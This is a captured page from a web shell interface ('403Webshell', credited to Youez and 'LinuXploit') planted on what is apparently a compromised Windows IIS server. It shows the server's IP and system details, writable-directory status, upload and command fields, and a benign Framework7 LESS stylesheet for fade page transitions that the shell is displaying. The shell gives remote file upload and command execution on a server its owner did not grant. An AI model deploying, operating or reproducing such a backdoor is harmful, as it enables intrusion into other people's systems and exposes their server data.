403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/framework7/node_modules/framework7/components/page/page-transitions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/framework7/node_modules/framework7/components/page/page-transitions/fade.less
// fade
.router-transition-f7-fade-forward,
.router-transition-f7-fade-backward {
  background: var(--f7-page-bg-color);
  .page {
    pointer-events: none;
  }
}
.router-transition-f7-fade-forward {
  .ios &,
  .md & {
    .page-next {
      opacity: 0;
      animation: f7-fade-in var(--f7-page-fade-transition-duration) forwards;
    }
    .page-current {
      animation: f7-fade-out var(--f7-page-fade-transition-duration) forwards;
    }
  }
}
.router-transition-f7-fade-backward {
  .ios &,
  .md & {
    .page-current {
      animation: f7-fade-out var(--f7-page-fade-transition-duration) forwards;
    }
    .page-previous {
      animation: f7-fade-in var(--f7-page-fade-transition-duration) forwards;
    }
  }
}
@keyframes f7-fade-in {
  from {
    opacity: 0;
  }
  50% {
    opacity: 0;
  }
  to {
    opacity: 1;
  }
}
@keyframes f7-fade-out {
  from {
    opacity: 1;
  }
  50% {
    opacity: 0;
  }
  to {
    opacity: 0;
  }
}

Youez - 2016 - github.com/yon3zu
LinuXploit